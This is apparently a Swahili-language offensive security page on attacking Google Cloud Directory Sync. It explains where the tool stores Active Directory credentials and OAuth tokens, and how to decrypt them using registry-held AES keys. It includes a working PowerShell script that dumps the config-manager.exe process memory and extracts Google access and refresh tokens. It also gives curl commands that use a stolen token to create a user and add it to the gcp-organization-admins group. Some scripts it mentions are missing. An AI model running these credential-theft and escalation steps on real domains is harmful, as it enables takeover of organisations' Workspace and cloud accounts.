Hii ni zana ambayo inaweza kutumika kusawazisha watumiaji na vikundi vya active directory kwenye Workspace yako (na si kinyume chake wakati wa kuandika hii).
Ni ya kuvutia kwa sababu ni zana ambayo itahitaji akidi za mtumiaji wa Workspace superuser na mtumiaji wa AD mwenye mamlaka. Hivyo, inaweza kuwa inawezekana kuipata ndani ya seva ya domain ambayo itakuwa ikisawazisha watumiaji mara kwa mara.
Ili kufanya MitM kwa config-manager.exe binary ongeza tu mstari ufuatao kwenye faili la config.manager.vmoptions: -Dcom.sun.net.ssl.checkRevocation=false
Kumbuka kwamba Winpeas ina uwezo wa kugundua GCDS, kupata taarifa kuhusu usanidi na hata nywila na akidi zilizofichwa.
Pia kumbuka kwamba GCDS haitasawazisha nywila kutoka AD hadi Workspace. Ikiwa kuna kitu itazalisha tu nywila za nasibu kwa watumiaji wapya walioundwa katika Workspace kama unavyoona kwenye picha ifuatayo:
GCDS - Disk Tokens & AD Credentials
Binary config-manager.exe (binary kuu ya GCDS yenye GUI) itahifadhi akidi za Active Directory zilizowekwa, token ya refresher na ufikiaji kwa default katika xml file kwenye folda C:\Program Files\Google Cloud Directory Sync katika faili inayoitwa Untitled-1.xml kwa default. Ingawa inaweza pia kuhifadhiwa katika Documents za mtumiaji au katika folda nyingine yoyote.
Zaidi ya hayo, rejista HKCU\SOFTWARE\JavaSoft\Prefs\com\google\usersyncapp\ui ndani ya ufunguo open.recent ina njia za faili zote za usanidi zilizofunguliwa hivi karibuni (xmls). Hivyo inawezekana kuangalia ili kuzipata.
Kumbuka jinsi refreshtoken na password ya mtumiaji zinavyokuwa encrypted kwa kutumia AES CBC na ufunguo na IV vilivyotengenezwa kwa bahati na kuhifadhiwa katika HKEY_CURRENT_USER\SOFTWARE\JavaSoft\Prefs\com\google\usersyncapp\util (popote ambapo maktaba ya prefs ya Java inahifadhi mapendeleo) katika funguo za mfuatano /Encryption/Policy/V2.iv na /Encryption/Policy/V2.key zilizohifadhiwa katika base64.
Powershell script ya kufungua **refresh token** na **password**
</details>
<div data-gb-custom-block data-tag="hint" data-style='info'>
Kumbuka kwamba inawezekana kuangalia habari hii kwa kuangalia msimbo wa java wa **`DirSync.jar`** kutoka **`C:\Program Files\Google Cloud Directory Sync`** ukitafuta mfuatano `exportkeys` (kama hiyo ndiyo param ya cli ambayo binary `upgrade-config.exe` inatarajia kutupa funguo).
</div>
Badala ya kutumia skripti ya powershell, pia inawezekana kutumia binary **`:\Program Files\Google Cloud Directory Sync\upgrade-config.exe`** na param `-exportKeys` na kupata **Key** na **IV** kutoka kwenye rejista kwa hex na kisha tumia cyberchef na AES/CBC na funguo hiyo na IV ili kufichua habari.
### GCDS - Kutupa tokeni kutoka kwenye kumbukumbu
Kama ilivyo na GCPW, inawezekana kutupa kumbukumbu ya mchakato wa `config-manager.exe` (hii ndiyo jina la binary kuu la GCDS lenye GUI) na utaweza kupata tokeni za refresha na ufikiaji (ikiwa tayari zimeundwa).\
Nadhani pia unaweza kupata akidi zilizowekwa za AD.
<details>
<summary>Dump config-manager.exe processes and search tokens</summary>
```powershell
# Define paths for Procdump and Strings utilities
$procdumpPath = "C:\Users\carlos_hacktricks\Desktop\SysinternalsSuite\procdump.exe"
$stringsPath = "C:\Users\carlos_hacktricks\Desktop\SysinternalsSuite\strings.exe"
$dumpFolder = "C:\Users\Public\dumps"
# Regular expressions for tokens
$tokenRegexes = @(
"ya29\.[a-zA-Z0-9_\.\-]{50,}",
"1//[a-zA-Z0-9_\.\-]{50,}"
)
# Create a directory for the dumps if it doesn't exist
if (!(Test-Path $dumpFolder)) {
New-Item -Path $dumpFolder -ItemType Directory
}
# Get all Chrome process IDs
$chromeProcesses = Get-Process -Name "config-manager" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Id
# Dump each Chrome process
foreach ($processId in $chromeProcesses) {
Write-Output "Dumping process with PID: $processId"
& $procdumpPath -accepteula -ma $processId "$dumpFolder\chrome_$processId.dmp"
}
# Extract strings and search for tokens in each dump
Get-ChildItem $dumpFolder -Filter "*.dmp" | ForEach-Object {
$dumpFile = $_.FullName
$baseName = $_.BaseName
$asciiStringsFile = "$dumpFolder\${baseName}_ascii_strings.txt"
$unicodeStringsFile = "$dumpFolder\${baseName}_unicode_strings.txt"
Write-Output "Extracting strings from $dumpFile"
& $stringsPath -accepteula -n 50 -nobanner $dumpFile > $asciiStringsFile
& $stringsPath -accepteula -n 50 -nobanner -u $dumpFile > $unicodeStringsFile
$outputFiles = @($asciiStringsFile, $unicodeStringsFile)
foreach ($file in $outputFiles) {
foreach ($regex in $tokenRegexes) {
$matches = Select-String -Path $file -Pattern $regex -AllMatches
$uniqueMatches = @{}
foreach ($matchInfo in $matches) {
foreach ($match in $matchInfo.Matches) {
$matchValue = $match.Value
if (-not $uniqueMatches.ContainsKey($matchValue)) {
$uniqueMatches[$matchValue] = @{
LineNumber = $matchInfo.LineNumber
LineText = $matchInfo.Line.Trim()
FilePath = $matchInfo.Path
}
}
}
}
foreach ($matchValue in $uniqueMatches.Keys) {
$info = $uniqueMatches[$matchValue]
Write-Output "Match found in file '$($info.FilePath)' on line $($info.LineNumber): $($info.LineText)"
}
}
Write-Output ""
}
}
Remove-Item -Path $dumpFolder -Recurse -Force
GCDS - Kutengeneza alama za ufikiaji kutoka kwa alama za upya
Kwa kutumia alama ya upya, inawezekana kutengeneza alama za ufikiaji kwa kutumia hiyo na kitambulisho cha mteja na siri ya mteja zilizoainishwa katika amri ifuatayo:
Kumbuka kwamba hata kuwa na token ya kusasisha, siwezi kuomba scope yoyote kwa token ya ufikiaji kwani unaweza tu kuomba scopes zinazoungwa mkono na programu ambapo unazalisha token ya ufikiaji.
Pia, token ya kusasisha si halali katika kila programu.
Kwa default GCSD haitaweza kupata kama mtumiaji kwa kila scope ya OAuth inay posible, hivyo kutumia script ifuatayo tunaweza kupata scopes ambazo zinaweza kutumika na refresh_token kuzalisha access_token:
#### Unda mtumiaji na umuweke kwenye kundi `gcp-organization-admins` ili kujaribu kupandisha hadhi katika GCP
```bash
# Create new user
curl -X POST \
'https://admin.googleapis.com/admin/directory/v1/users' \
-H 'Authorization: Bearer <ACCESS_TOKEN>' \
-H 'Content-Type: application/json' \
-d '{
"primaryEmail": "deleteme@domain.com",
"name": {
"givenName": "Delete",
"familyName": "Me"
},
"password": "P4ssw0rdStr0ng!",
"changePasswordAtNextLogin": false
}'
# Add to group
curl -X POST \
'https://admin.googleapis.com/admin/directory/v1/groups/gcp-organization-admins@domain.com/members' \
-H 'Authorization: Bearer <ACCESS_TOKEN>' \
-H 'Content-Type: application/json' \
-d '{
"email": "deleteme@domain.com",
"role": "OWNER"
}'
# You could also change the password of a user for example
Haiwezekani kumpa mtumiaji mpya jukumu la Super Amin kwa sababu token ya kusasisha haina maeneo ya kutosha kutoa mamlaka yanayohitajika.